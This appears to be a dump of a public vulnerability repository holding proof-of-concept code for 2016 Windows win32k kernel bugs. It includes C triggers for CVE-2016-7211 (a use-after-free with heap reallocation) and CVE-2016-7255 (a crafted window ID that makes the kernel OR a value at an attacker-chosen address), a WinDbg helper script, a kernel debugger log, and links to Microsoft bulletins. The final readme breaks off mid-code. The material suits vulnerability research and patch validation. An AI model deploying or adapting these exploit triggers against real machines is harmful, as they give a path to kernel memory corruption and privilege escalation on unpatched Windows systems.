├── CVE-2016-0048 └── readme.md ├── CVE-2016-0096 ├── poc.js └── readme.md ├── CVE-2016-3252 └── readme.md ├── CVE-2016-7211 ├── poc.c └── readme.md ├── CVE-2016-7255 ├── capture.png ├── hwnd.js ├── log.asm ├── poc.c └── readme.md ├── CVE-2016-7260 └── readme.md └── README.md /CVE-2016-0048/readme.md: -------------------------------------------------------------------------------- 1 | [MS16-018](https://technet.microsoft.com/en-us/library/security/ms16-018.aspx) -------------------------------------------------------------------------------- /CVE-2016-0096/poc.js: -------------------------------------------------------------------------------- 1 | function poc() 2 | { 3 | var hWnd = 0; 4 | var hOtherWnd = 0; 5 | /* PoC driver for CVE-2016-0096 (see readme.md): takes one list of window handles, then repeatedly picks two at random, reparents the first under the second with SetParent and, on a coin flip, calls SwitchToThisWindow on it. EnumWindows, RandomSelectFromArray and Random are not defined in this file. */ 6 | var HWND_ARRAY = EnumWindows(); 7 | 8 | while(1) /* never terminates on its own; the "return 0" below is unreachable */ 9 | { 10 | hWnd = RandomSelectFromArray(HWND_ARRAY); 11 | if ( 0 == hWnd ) 12 | { 13 | continue; 14 | } 15 | 16 | hOtherWnd = RandomSelectFromArray(HWND_ARRAY); 17 | 18 | SetParent(hWnd , hOtherWnd); 19 | if ( 0 == Random(0 , 1) ) 20 | { 21 | SwitchToThisWindow(hWnd , Random(0 , 1) ); 22 | } 23 | } 24 | 25 | 26 | return 0; 27 | } -------------------------------------------------------------------------------- /CVE-2016-0096/readme.md: -------------------------------------------------------------------------------- 1 | [MS16-034](https://technet.microsoft.com/en-us/library/security/ms16-034.aspx) -------------------------------------------------------------------------------- /CVE-2016-3252/readme.md: -------------------------------------------------------------------------------- 1 | [MS16-090](https://technet.microsoft.com/en-us/library/security/ms16-090.aspx) -------------------------------------------------------------------------------- /CVE-2016-7211/poc.c: -------------------------------------------------------------------------------- 1 | /* 2 | ******************************************************************** 3 | Created: 2016-07-08 14:17:28 4 | Filename: poc.c 5 | Author: root@tinysec.net 6 | 
********************************************************************* 7 | */ 8 | #pragma warning(disable:4152) 9 | #pragma warning(disable:4127) 10 | 11 | #include 12 | #include 13 | #include 14 | 15 | 16 | #pragma comment(lib,"ntdll.lib") 17 | 18 | 19 | typedef struct _LARGE_UNICODE_STRING { 20 | ULONG Length; 21 | ULONG MaximumLength : 31; 22 | ULONG bAnsi : 1; 23 | PWSTR Buffer; 24 | } LARGE_UNICODE_STRING, *PLARGE_UNICODE_STRING; 25 | 26 | 27 | 28 | BOOL __stdcall NtGdiMakeObjectXferable(__in HGDIOBJ hObject , __in ULONG nProcessId); 29 | 30 | BOOL __stdcall NtUserLockWindowUpdate(__in HWND hWnd); 31 | 32 | BOOL __stdcall NtUserScrollDC(__in HDC hDC , __in int nX , __in int nY , __in RECT* lprcScroll , __in RECT* lprcClip , __in HRGN hRgnUpdate , __in RECT* lprcUpdate); 33 | 34 | BOOL __stdcall NtUserDefSetText(__in HWND hWnd , __in PVOID plsWindowText); 35 | 36 | 37 | #define SET_ULONG(p,offset,value) (*( (ULONG*)( ((UCHAR*)(p)) + (offset) ) ) = ((ULONG)(value)) ) 38 | 39 | VOID RtlInitLargeUnicodeString( 40 | PLARGE_UNICODE_STRING plstr, 41 | LPCWSTR psz, 42 | UINT cchLimit) 43 | { 44 | plstr->Buffer = (PWSTR)psz; 45 | plstr->bAnsi = FALSE; 46 | 47 | plstr->Length = cchLimit; 48 | plstr->MaximumLength = cchLimit; 49 | } 50 | 51 | 52 | int __cdecl wmain(int nArgc, WCHAR** Argv) 53 | { 54 | HWND hWnd = NULL; 55 | HDC hDC = NULL; 56 | 57 | WNDCLASSEXW wc = {0}; 58 | RECT rc1 = {0}; 59 | 60 | LARGE_UNICODE_STRING lusEvil = {0}; 61 | WCHAR szUserBuffer[ 0x870 ] = {0}; 62 | 63 | ULONG nWantedAddress = 0xdeadbeef; 64 | 65 | 66 | // for win10 67 | wc.cbSize = sizeof(wc); 68 | wc.cbClsExtra = 0; 69 | wc.cbWndExtra = 0x1000; 70 | wc.hbrBackground = NULL; 71 | wc.hCursor = NULL; 72 | wc.hIcon = NULL; 73 | wc.hIconSm = NULL; 74 | wc.hInstance = GetModuleHandleW(NULL); 75 | wc.lpfnWndProc = DefWindowProcW; 76 | wc.lpszClassName = L"CVE-2016-7211"; 77 | wc.lpszMenuName = NULL; 78 | wc.style = CS_CLASSDC; 79 | 80 | RegisterClassExW(&wc); 81 | 82 | hWnd = CreateWindowW( 83 | 
L"CVE-2016-7211" , 84 | L"CVE-2016-7211", 85 | WS_OVERLAPPEDWINDOW|WS_VISIBLE, 86 | 0, 87 | 0, 88 | 400, 89 | 400, 90 | NULL, 91 | NULL, 92 | GetModuleHandleW(NULL) , 93 | NULL 94 | ); 95 | 96 | hDC = GetWindowDC( hWnd ); 97 | 98 | memset(szUserBuffer , 0xFF , sizeof(szUserBuffer) - sizeof(WCHAR) ); 99 | 100 | SET_ULONG( szUserBuffer , 0x020 , 0xFFFFFFFF ); 101 | 102 | SET_ULONG( szUserBuffer , 0x02a , 0x29D ); 103 | 104 | #ifdef _WIN64 105 | SET_ULONG( szUserBuffer , 0x034 , nWantedAddress - 0x034 ); 106 | #else 107 | SET_ULONG( szUserBuffer , 0x034 , nWantedAddress - 0x034 ); 108 | #endif 109 | 110 | RtlInitLargeUnicodeString(&lusEvil , szUserBuffer , sizeof(szUserBuffer) - sizeof(WCHAR) ); 111 | 112 | NtGdiMakeObjectXferable( hDC , 0 ); 113 | 114 | // free 115 | DestroyWindow(hWnd); 116 | 117 | // re-alloc 118 | NtUserDefSetText( GetDesktopWindow() , &lusEvil ); 119 | 120 | NtUserLockWindowUpdate( GetDesktopWindow() ); 121 | 122 | rc1.left = 354; 123 | rc1.top = 12; 124 | rc1.right = 459; 125 | rc1.bottom = 831; 126 | 127 | // use! 
128 | NtUserScrollDC( hDC , 10 , 20 , &rc1 , &rc1 , NULL , &rc1 ); 129 | 130 | return 0; 131 | } 132 | 133 | 134 | 135 | -------------------------------------------------------------------------------- /CVE-2016-7211/readme.md: -------------------------------------------------------------------------------- 1 | [MS16-123](https://technet.microsoft.com/library/security/MS16-123) -------------------------------------------------------------------------------- /CVE-2016-7255/capture.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tinysec/vulnerability/38223d93dff106e27153a1f18605ae4774c4147a/CVE-2016-7255/capture.png -------------------------------------------------------------------------------- /CVE-2016-7255/hwnd.js: -------------------------------------------------------------------------------- 1 | /* 2 | UTF8占位 3 | lib - tagWND.js 4 | 5 | function ( __MODULE__ , exports , require , __FILE__ ) 6 | */ 7 | 8 | // Role Check 9 | var base = require("base"); 10 | if ( !base.FlagOn( base.GetRole() , base.JSRT_WINDBG ) ) 11 | { 12 | base.printf('[-] Not In Windbg Mode!\n'); 13 | return 0; 14 | } 15 | 16 | var win32 = require("windows"); 17 | var windbg = require("windbg"); 18 | 19 | var assert = base.assert; 20 | var isArray = base.isArray; 21 | var isString = base.isString; 22 | var isFunction = base.isFunction; 23 | var isNumber = base.isNumber; 24 | var isObject = base.isObject; 25 | var isNull = base.isNull; 26 | var isNullOrUndefined = base.isNullOrUndefined; 27 | var isUndefined = base.isUndefined; 28 | var isPointer = base.isPointer; 29 | var Pointer = base.Pointer; 30 | var LargeInteger2Pointer = base.LargeInteger2Pointer; 31 | 32 | var isx64 = base.isx64; 33 | var FlagOn = base.FlagOn; 34 | var POINTER_SIZE = base.POINTER_SIZE; 35 | 36 | 37 | var printf = base.printf; 38 | var KdPrint = base.KdPrint; 39 | var sprintf = base.sprintf; 40 | 41 | var setchar = base.setchar; 42 | var setuchar = 
base.setuchar; 43 | var setushort = base.setushort; 44 | var setint = base.setint; 45 | var setuint = base.setuint; 46 | var setlong = base.setlong; 47 | var setulong = base.setulong; 48 | var setpointer = base.setpointer; 49 | var setstring = base.setstring; 50 | 51 | var getchar = base.getchar; 52 | var getuchar = base.getuchar; 53 | var getushort = base.getushort; 54 | var getint = base.getint; 55 | var getuint = base.getuint; 56 | var getlong = base.getlong; 57 | var getulong = base.getulong; 58 | var getpointer = base.getpointer; 59 | var getstring = base.getstring; 60 | 61 | var cast2Boolean = base.cast2Boolean; 62 | var cast2CHAR = base.cast2CHAR; 63 | var cast2UCHAR = base.cast2UCHAR; 64 | var cast2SHORT = base.cast2SHORT; 65 | var cast2USHORT = base.cast2USHORT; 66 | var cast2INT = base.cast2INT; 67 | var cast2UINT = base.cast2UINT; 68 | var cast2LONG = base.cast2LONG; 69 | var cast2ULONG = base.cast2ULONG; 70 | var cast2Pointer = base.cast2Pointer; 71 | var cast2float = base.cast2float; 72 | var cast2double = base.cast2double; 73 | 74 | // ------------------------------------------------------ 75 | 76 | // win32 77 | 78 | const OS_UNKNOWN = win32.OS_UNKNOWN; 79 | 80 | const OS_XP_SP0 = win32.OS_XP_SP0; // 5.1 81 | const OS_XP_SP1 = win32.OS_XP_SP1; 82 | const OS_XP_SP2 = win32.OS_XP_SP2; 83 | const OS_XP_SP3 = win32.OS_XP_SP3; 84 | 85 | const OS_2003_SP0 = win32.OS_2003_SP0; // 5.2 86 | const OS_2003_SP1 = win32.OS_2003_SP1; 87 | const OS_2003_SP2 = win32.OS_2003_SP2; 88 | 89 | const OS_VISTA_SP0 = win32.OS_VISTA_SP0; // 6.0 90 | const OS_VISTA_SP1 = win32.OS_VISTA_SP1; 91 | const OS_VISTA_SP2 = win32.OS_VISTA_SP2; 92 | 93 | const OS_2008_SP1 = win32.OS_2008_SP1; 94 | const OS_2008_SP2 = win32.OS_2008_SP2; 95 | 96 | const OS_2008_R2_SP0 = win32.OS_2008_R2_SP0; // 6.1 97 | const OS_2008_R2_SP1 = win32.OS_2008_R2_SP1; 98 | 99 | const OS_7_SP0 = win32.OS_7_SP0; 100 | const OS_7_SP1 = win32.OS_7_SP1; 101 | 102 | const OS_2012 = win32.OS_2012; // 6.2 103 | 
const OS_8 = win32.OS_8; 104 | 105 | const OS_2012_R2 = win32.OS_2012_R2; // 6.3 106 | const OS_8DOT1 = win32.OS_8DOT1; 107 | 108 | const OS_2016 = win32.OS_2016; // 10.0 109 | 110 | const OS_10TH1 = win32.OS_10TH1; 111 | const OS_10TH2 = win32.OS_10TH2; 112 | const OS_10RS1 = win32.OS_10RS1; 113 | 114 | const OS_MAX = win32.OS_MAX; 115 | 116 | //---------------------------------------------------- 117 | // windbg 118 | var ReadVirtualChar = windbg.ReadVirtualChar; 119 | var ReadVirtualUChar = windbg.ReadVirtualUChar; 120 | var ReadVirtualShort = windbg.ReadVirtualShort; 121 | var ReadVirtualUShort = windbg.ReadVirtualUShort; 122 | var ReadVirtualUInt = windbg.ReadVirtualUInt; 123 | var ReadVirtualLong = windbg.ReadVirtualLong; 124 | var ReadVirtualULong = windbg.ReadVirtualULong; 125 | var ReadVirtualPointer = windbg.ReadVirtualPointer; 126 | var ReadVirtualFloat = windbg.ReadVirtualFloat; 127 | var ReadVirtualDouble = windbg.ReadVirtualDouble; 128 | var ReadVirtualStringA = windbg.ReadVirtualStringA; 129 | var ReadVirtualStringW = windbg.ReadVirtualStringW; 130 | 131 | var WriteVirtualChar = windbg.WriteVirtualChar; 132 | var WriteVirtualUChar = windbg.WriteVirtualUChar; 133 | var WriteVirtualShort = windbg.WriteVirtualShort; 134 | var WriteVirtualUShort = windbg.WriteVirtualUShort; 135 | var WriteVirtualInt = windbg.WriteVirtualInt; 136 | var WriteVirtualUInt = windbg.WriteVirtualUInt 137 | var WriteVirtualLong = windbg.WriteVirtualLong; 138 | var WriteVirtualULong = windbg.WriteVirtualULong; 139 | var WriteVirtualPointer = windbg.WriteVirtualPointer; 140 | var WriteVirtualFloat = windbg.WriteVirtualFloat; 141 | var WriteVirtualDouble = windbg.WriteVirtualDouble; 142 | var WriteVirtualStringA = windbg.WriteVirtualStringA; 143 | var WriteVirtualStringW = windbg.WriteVirtualStringW; 144 | 145 | var GetRegChar = windbg.GetRegChar; 146 | var GetRegUChar = windbg.GetRegUChar; 147 | var GetRegShort = windbg.GetRegShort; 148 | var GetRegUShort = windbg.GetRegUShort; 
149 | var GetRegInt = windbg.GetRegInt; 150 | var GetRegUInt = windbg.GetRegUInt; 151 | var GetRegLong = windbg.GetRegLong; 152 | var GetRegULong = windbg.GetRegULong; 153 | var GetRegPointer = windbg.GetRegPointer; 154 | var GetRegFloat = windbg.GetRegFloat; 155 | var GetRegDouble = windbg.GetRegDouble; 156 | 157 | var SetRegChar = windbg.SetRegChar; 158 | var SetRegUChar = windbg.SetRegUChar; 159 | var SetRegShort = windbg.SetRegShort; 160 | var SetRegUShort = windbg.SetRegUShort; 161 | var SetRegInt = windbg.SetRegInt; 162 | var SetRegUInt = windbg.SetRegUInt; 163 | var SetRegLong = windbg.SetRegLong; 164 | var SetRegULong = windbg.SetRegULong; 165 | var SetRegPointer = windbg.SetRegPointer; 166 | var SetRegFloat = windbg.SetRegFloat; 167 | var SetRegDouble = windbg.SetRegDouble; 168 | 169 | var GetRegChar = windbg.GetRegChar; 170 | 171 | 172 | var GetSymbolAddress = windbg.GetSymbolAddress; 173 | var GetAddressSymbol = windbg.GetAddressSymbol; 174 | 175 | var GetFieldOffset = windbg.GetFieldOffset; 176 | var CONTAINING_RECORD = windbg.CONTAINING_RECORD; 177 | 178 | var ReloadModule = windbg.ReloadModule; 179 | var GetImageBase = windbg.GetImageBase; 180 | 181 | var ExecuteCommand = windbg.ExecuteCommand; 182 | 183 | var GetSystemVersion = windbg.GetSystemVersion; 184 | var IsPointer64Bit = windbg.IsPointer64Bit; 185 | 186 | var PsGetCurrentThread = windbg.PsGetCurrentThread; 187 | var PsGetCurrentProcess = windbg.PsGetCurrentProcess; 188 | var PsGetThreadWin32Thread = windbg.PsGetThreadWin32Thread; 189 | var PsGetCurrentWin32Thread = windbg.PsGetCurrentWin32Thread; 190 | var GetImplicitProcess = windbg.GetImplicitProcess; 191 | var SetImplicitProcess = windbg.SetImplicitProcess; 192 | var GetImplicitThread = windbg.GetImplicitThread; 193 | var SetImplicitThread = windbg.SetImplicitThread; 194 | 195 | var PsGetActiveProcessList = windbg.PsGetActiveProcessList; 196 | var PsLookupProcessByProcessImageName = windbg.PsLookupProcessByProcessImageName; 197 | 198 | // 
-------------------------------------------------------------------- 199 | 200 | 201 | 202 | // -------------------------------------------------------------------- 203 | 204 | function HWND2PWND( hWnd ) 205 | { 206 | var gSharedInfo = null; 207 | var gpsi = null; 208 | 209 | var pServerInfo = null; 210 | 211 | var cHandleEntries = 0; 212 | var wIndex = 0; 213 | 214 | var aheList = null; 215 | var HeEntrySize = 0; 216 | 217 | var pHeEntry = null; 218 | var strType = ''; 219 | 220 | var HandleEntry = {}; 221 | 222 | var pWnd = null; 223 | 224 | var hHandle = null; 225 | 226 | 227 | do 228 | { 229 | 230 | 231 | gSharedInfo = GetSymbolAddress('win32kbase!gSharedInfo'); 232 | gpsi = GetSymbolAddress('win32kbase!gpsi'); 233 | 234 | 235 | pServerInfo = ReadVirtualPointer(gpsi , 0x00); 236 | 237 | 238 | cHandleEntries = ReadVirtualLong(pServerInfo , POINTER_SIZE ); 239 | 240 | 241 | aheList = ReadVirtualPointer(gSharedInfo , POINTER_SIZE * 1 ); 242 | HeEntrySize = ReadVirtualLong(gSharedInfo , POINTER_SIZE * 2 ); 243 | 244 | 245 | for ( wIndex = 0; wIndex < cHandleEntries; wIndex++ ) 246 | { 247 | pHeEntry = aheList.add( HeEntrySize * wIndex ); 248 | 249 | HandleEntry = {}; 250 | 251 | HandleEntry.phead = ReadVirtualPointer( pHeEntry , POINTER_SIZE * 0 ); 252 | HandleEntry.pOwner = ReadVirtualPointer( pHeEntry , POINTER_SIZE * 1 ); 253 | HandleEntry.wUniq = ReadVirtualUShort( pHeEntry , POINTER_SIZE * 2 + 0x02 ); 254 | 255 | hHandle = new Pointer( sprintf('0x%04x%04x' , HandleEntry.wUniq , wIndex ) ); 256 | 257 | if ( null != hHandle ) 258 | { 259 | if ( 0 == hHandle.cmp(hWnd) ) 260 | { 261 | pWnd = HandleEntry.phead ; 262 | break; 263 | } 264 | } 265 | } 266 | 267 | }while(false); 268 | 269 | return pWnd; 270 | } 271 | 272 | 273 | function main(argv) 274 | { 275 | var hWnd = null; 276 | var pWnd = null; 277 | 278 | do 279 | { 280 | if ( argv.length <= 1 ) 281 | { 282 | break; 283 | } 284 | 285 | try 286 | { 287 | hWnd = new Pointer( argv[1] ); 288 | } 289 | catch(error) 
290 | { 291 | break; 292 | } 293 | 294 | pWnd = HWND2PWND( hWnd ) ; 295 | 296 | printf("[hWnd] 0x%p -> [pWnd] 0x%p \n" , hWnd , pWnd ); 297 | 298 | }while(false); 299 | 300 | return 0; 301 | } 302 | exports.main = main; 303 | 304 | 305 | // -------------------------------------------------------------------- -------------------------------------------------------------------------------- /CVE-2016-7255/log.asm: -------------------------------------------------------------------------------- 1 | 2 | kd> g 3 | hWndChild = 0x000A0402 4 | Break instruction exception - code 80000003 (first chance) 5 | 001b:7557d352 cc int 3 6 | kd> .reload /f win32kbase.sys 7 | kd> .reload /f win32kfull.sys 8 | kd> .reload /f symhelp.sys 9 | kd> .load jswd 10 | kd> !js D:\root\WorkCode\jswd_script\syn\hwnd.js 0x000A0402 11 | [hWnd] 0x000a0402 -> [pWnd] 0x958139c8 12 | 13 | kd> dt win32kfull!tagWND spmenu 0x958139c8 14 | +0x078 spmenu : 0xffffffeb tagMENU 15 | kd> ba r 4 0x958139c8+ 0x078 16 | kd> g 17 | Breakpoint 0 hit 18 | win32kfull!xxxNextWindow+0x253: 19 | 94393f70 85c0 test eax,eax 20 | kd> r 21 | eax=ffffffeb ebx=93ad2c48 ecx=958229f0 edx=0000c035 esi=00000000 edi=958139c8 22 | eip=94393f70 esp=89f4f9a0 ebp=89f4fa08 iopl=0 nv up ei pl nz na po nc 23 | cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202 24 | win32kfull!xxxNextWindow+0x253: 25 | 94393f70 85c0 test eax,eax 26 | kd> t 27 | win32kfull!xxxNextWindow+0x255: 28 | 94393f72 7404 je win32kfull!xxxNextWindow+0x25b (94393f78) 29 | kd> t 30 | win32kfull!xxxNextWindow+0x257: 31 | 94393f74 83481404 or dword ptr [eax+14h],4 32 | kd> r 33 | eax=ffffffeb ebx=93ad2c48 ecx=958229f0 edx=0000c035 esi=00000000 edi=958139c8 34 | eip=94393f74 esp=89f4f9a0 ebp=89f4fa08 iopl=0 nv up ei ng nz na pe nc 35 | cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000286 36 | win32kfull!xxxNextWindow+0x257: 37 | 94393f74 83481404 or dword ptr [eax+14h],4 ds:0023:ffffffff=???????? 
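38 | -------------------------------------------------------------------------------- /CVE-2016-7255/poc.c: --------------------------------------------------------------------------------
1 | /*
2 | ********************************************************************
3 | Created: 2016-11-09 14:23:09
4 | Filename: main.c
5 | Author: root[at]TinySec.net
6 | Version 0.0.0.1
7 | Purpose: poc of cve-2016-7255
8 | *********************************************************************
9 | */
10 | 
11 | #include
12 | #include
13 | #include
14 | #include
15 | 
16 | 
17 | //////////////////////////////////////////////////////////////////////////
18 | #pragma comment(lib,"ntdll.lib")
19 | #pragma comment(lib,"user32.lib")
20 | /* DbgPrint: printf-style debug helper. Formats the arguments into a 1 KiB heap buffer and hands the text to DbgPrintEx (component 77, level 0) and OutputDebugStringA. Output is silently dropped if the allocation fails. Always returns 0. */
21 | #undef DbgPrint
22 | ULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );
23 | ULONG __cdecl DbgPrint(__in char* Format, ...)
24 | {
25 | CHAR* pszDbgBuff = NULL;
26 | va_list VaList; /* left to va_start: va_list is an array type on some ABIs, so "= NULL" is not portable */
27 | ULONG ulRet = 0;
28 | 
29 | do
30 | {
31 | pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));
32 | if (NULL == pszDbgBuff)
33 | {
34 | break;
35 | }
36 | RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR)); /* zeroed so the last byte stays NUL even when _vsnprintf truncates */
37 | 
38 | va_start(VaList,Format);
39 | 
40 | _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);
41 | 
42 | DbgPrintEx(77 , 0 , "%s" , pszDbgBuff ); /* the formatted text is data, not a format string: it may contain '%' from caller-supplied arguments */
43 | OutputDebugStringA(pszDbgBuff);
44 | 
45 | va_end(VaList);
46 | 
47 | } while (FALSE);
48 | 
49 | if (NULL != pszDbgBuff)
50 | {
51 | HeapFree( GetProcessHeap(), 0 , pszDbgBuff );
52 | pszDbgBuff = NULL;
53 | }
54 | 
55 | return ulRet;
56 | }
57 | 
58 | 
59 | int _sim_key_down(WORD wKey)
60 | {
61 | INPUT stInput = {0};
62 | 
63 | do
64 | {
65 | stInput.type = INPUT_KEYBOARD;
66 | stInput.ki.wVk = wKey;
67 | stInput.ki.dwFlags = 0;
68 | 
69 | SendInput(1 , &stInput , sizeof(stInput) );
70 | 
71 | } while (FALSE);
72 | 
73 | return 0;
74 | }
75 | 
76 | int _sim_key_up(WORD wKey)
77 | {
78 | INPUT stInput = {0};
79 | 
80 | do
81 | {
82 | stInput.type = INPUT_KEYBOARD;
83 | 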
stInput.ki.wVk = wKey; 84 | stInput.ki.dwFlags = KEYEVENTF_KEYUP; 85 | 86 | SendInput(1 , &stInput , sizeof(stInput) ); 87 | 88 | } while (FALSE); 89 | 90 | return 0; 91 | } 92 | 93 | int _sim_alt_shift_esc() 94 | { 95 | int i = 0; 96 | 97 | do 98 | { 99 | _sim_key_down( VK_MENU ); 100 | _sim_key_down( VK_SHIFT ); 101 | 102 | 103 | _sim_key_down( VK_ESCAPE); 104 | _sim_key_up( VK_ESCAPE); 105 | 106 | _sim_key_down( VK_ESCAPE); 107 | _sim_key_up( VK_ESCAPE); 108 | 109 | _sim_key_up( VK_MENU ); 110 | _sim_key_up( VK_SHIFT ); 111 | 112 | 113 | } while (FALSE); 114 | 115 | return 0; 116 | } 117 | 118 | 119 | 120 | int _sim_alt_shift_tab(int nCount) 121 | { 122 | int i = 0; 123 | HWND hWnd = NULL; 124 | 125 | 126 | int nFinalRet = -1; 127 | 128 | do 129 | { 130 | _sim_key_down( VK_MENU ); 131 | _sim_key_down( VK_SHIFT ); 132 | 133 | 134 | for ( i = 0; i < nCount ; i++) 135 | { 136 | _sim_key_down( VK_TAB); 137 | _sim_key_up( VK_TAB); 138 | 139 | Sleep(1000); 140 | 141 | } 142 | 143 | 144 | _sim_key_up( VK_MENU ); 145 | _sim_key_up( VK_SHIFT ); 146 | } while (FALSE); 147 | 148 | return nFinalRet; 149 | } 150 | 151 | 152 | 153 | int or_address_value_4(__in void* pAddress) 154 | { 155 | WNDCLASSEXW stWC = {0}; 156 | 157 | HWND hWndParent = NULL; 158 | HWND hWndChild = NULL; 159 | 160 | WCHAR* pszClassName = L"cve-2016-7255"; 161 | WCHAR* pszTitleName = L"cve-2016-7255"; 162 | 163 | void* pId = NULL; 164 | MSG stMsg = {0}; 165 | 166 | do 167 | { 168 | 169 | stWC.cbSize = sizeof(stWC); 170 | stWC.lpfnWndProc = DefWindowProcW; 171 | stWC.lpszClassName = pszClassName; 172 | 173 | if ( 0 == RegisterClassExW(&stWC) ) 174 | { 175 | break; 176 | } 177 | 178 | hWndParent = CreateWindowExW( 179 | 0, 180 | pszClassName, 181 | NULL, 182 | WS_OVERLAPPEDWINDOW|WS_VISIBLE, 183 | 0, 184 | 0, 185 | 360, 186 | 360, 187 | NULL, 188 | NULL, 189 | GetModuleHandleW(NULL), 190 | NULL 191 | ); 192 | 193 | if (NULL == hWndParent) 194 | { 195 | break; 196 | } 197 | 198 | hWndChild = 
CreateWindowExW( 199 | 0, 200 | pszClassName, 201 | pszTitleName, 202 | WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD, 203 | 0, 204 | 0, 205 | 160, 206 | 160, 207 | hWndParent, 208 | NULL, 209 | GetModuleHandleW(NULL), 210 | NULL 211 | ); 212 | 213 | if (NULL == hWndChild) 214 | { 215 | break; 216 | } 217 | 218 | #ifdef _WIN64 219 | pId = ( (UCHAR*)pAddress - 0x28 ); 220 | #else 221 | pId = ( (UCHAR*)pAddress - 0x14); 222 | #endif // #ifdef _WIN64 223 | 224 | SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId ); 225 | 226 | DbgPrint("hWndChild = 0x%p\n" , hWndChild); 227 | DebugBreak(); 228 | 229 | ShowWindow(hWndParent , SW_SHOWNORMAL); 230 | 231 | SetParent(hWndChild , GetDesktopWindow() ); 232 | 233 | SetForegroundWindow(hWndChild); 234 | 235 | _sim_alt_shift_tab(4); 236 | 237 | SwitchToThisWindow(hWndChild , TRUE); 238 | 239 | _sim_alt_shift_esc(); 240 | 241 | 242 | while( GetMessage(&stMsg , NULL , 0 , 0) ) 243 | { 244 | TranslateMessage(&stMsg); 245 | DispatchMessage(&stMsg); 246 | } 247 | 248 | 249 | } while (FALSE); 250 | 251 | if ( NULL != hWndParent ) 252 | { 253 | DestroyWindow(hWndParent); 254 | hWndParent = NULL; 255 | } 256 | 257 | if ( NULL != hWndChild ) 258 | { 259 | DestroyWindow(hWndChild); 260 | hWndChild = NULL; 261 | } 262 | 263 | UnregisterClassW(pszClassName , GetModuleHandleW(NULL) ); 264 | 265 | return 0; 266 | } 267 | 268 | int __cdecl wmain(int nArgc, WCHAR** Argv) 269 | { 270 | do 271 | { 272 | or_address_value_4( (void*)0xFFFFFFFF ); 273 | } while (FALSE); 274 | 275 | return 0; 276 | } 277 | 278 | 279 | -------------------------------------------------------------------------------- /CVE-2016-7255/readme.md: -------------------------------------------------------------------------------- 1 | # poc for CVE-2016-7255 2 | 3 | 4 | 5 | ```c 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | 13 | #pragma comment(lib,"ntdll.lib") 14 | #pragma comment(lib,"user32.lib") 15 | 16 | #undef DbgPrint 17 | ULONG __cdecl DbgPrintEx( IN 
ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... ); 18 | ULONG __cdecl DbgPrint(__in char* Format, ...) 19 | { 20 | CHAR* pszDbgBuff = NULL; 21 | va_list VaList=NULL; 22 | ULONG ulRet = 0; 23 | 24 | do 25 | { 26 | pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR)); 27 | if (NULL == pszDbgBuff) 28 | { 29 | break; 30 | } 31 | RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR)); 32 | 33 | va_start(VaList,Format); 34 | 35 | _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList); 36 | 37 | DbgPrintEx(77 , 0 , pszDbgBuff ); 38 | OutputDebugStringA(pszDbgBuff); 39 | 40 | va_end(VaList); 41 | 42 | } while (FALSE); 43 | 44 | if (NULL != pszDbgBuff) 45 | { 46 | HeapFree( GetProcessHeap(), 0 , pszDbgBuff ); 47 | pszDbgBuff = NULL; 48 | } 49 | 50 | return ulRet; 51 | } 52 | 53 | 54 | int _sim_key_down(WORD wKey) 55 | { 56 | INPUT stInput = {0}; 57 | 58 | do 59 | { 60 | stInput.type = INPUT_KEYBOARD; 61 | stInput.ki.wVk = wKey; 62 | stInput.ki.dwFlags = 0; 63 | 64 | SendInput(1 , &stInput , sizeof(stInput) ); 65 | 66 | } while (FALSE); 67 | 68 | return 0; 69 | } 70 | 71 | int _sim_key_up(WORD wKey) 72 | { 73 | INPUT stInput = {0}; 74 | 75 | do 76 | { 77 | stInput.type = INPUT_KEYBOARD; 78 | stInput.ki.wVk = wKey; 79 | stInput.ki.dwFlags = KEYEVENTF_KEYUP; 80 | 81 | SendInput(1 , &stInput , sizeof(stInput) ); 82 | 83 | } while (FALSE); 84 | 85 | return 0; 86 | } 87 | 88 | int _sim_alt_shift_esc() 89 | { 90 | int i = 0; 91 | 92 | do 93 | { 94 | _sim_key_down( VK_MENU ); 95 | _sim_key_down( VK_SHIFT ); 96 | 97 | 98 | _sim_key_down( VK_ESCAPE); 99 | _sim_key_up( VK_ESCAPE); 100 | 101 | _sim_key_down( VK_ESCAPE); 102 | _sim_key_up( VK_ESCAPE); 103 | 104 | _sim_key_up( VK_MENU ); 105 | _sim_key_up( VK_SHIFT ); 106 | 107 | 108 | } while (FALSE); 109 | 110 | return 0; 111 | } 112 | 113 | 114 | 115 | int _sim_alt_shift_tab(int nCount) 116 | { 117 | int i = 0; 118 | HWND hWnd = NULL; 119 | 120 | 121 | int nFinalRet = -1; 122 | 123 | do 124 | { 125 | _sim_key_down( 
VK_MENU ); 126 | _sim_key_down( VK_SHIFT ); 127 | 128 | 129 | for ( i = 0; i < nCount ; i++) 130 | { 131 | _sim_key_down( VK_TAB); 132 | _sim_key_up( VK_TAB); 133 | 134 | Sleep(1000); 135 | 136 | } 137 | 138 | 139 | _sim_key_up( VK_MENU ); 140 | _sim_key_up( VK_SHIFT ); 141 | } while (FALSE); 142 | 143 | return nFinalRet; 144 | } 145 | 146 | 147 | 148 | int or_address_value_4(__in void* pAddress) 149 | { 150 | WNDCLASSEXW stWC = {0}; 151 | 152 | HWND hWndParent = NULL; 153 | HWND hWndChild = NULL; 154 | 155 | WCHAR* pszClassName = L"cve-2016-7255"; 156 | WCHAR* pszTitleName = L"cve-2016-7255"; 157 | 158 | void* pId = NULL; 159 | MSG stMsg = {0}; 160 | 161 | do 162 | { 163 | 164 | stWC.cbSize = sizeof(stWC); 165 | stWC.lpfnWndProc = DefWindowProcW; 166 | stWC.lpszClassName = pszClassName; 167 | 168 | if ( 0 == RegisterClassExW(&stWC) ) 169 | { 170 | break; 171 | } 172 | 173 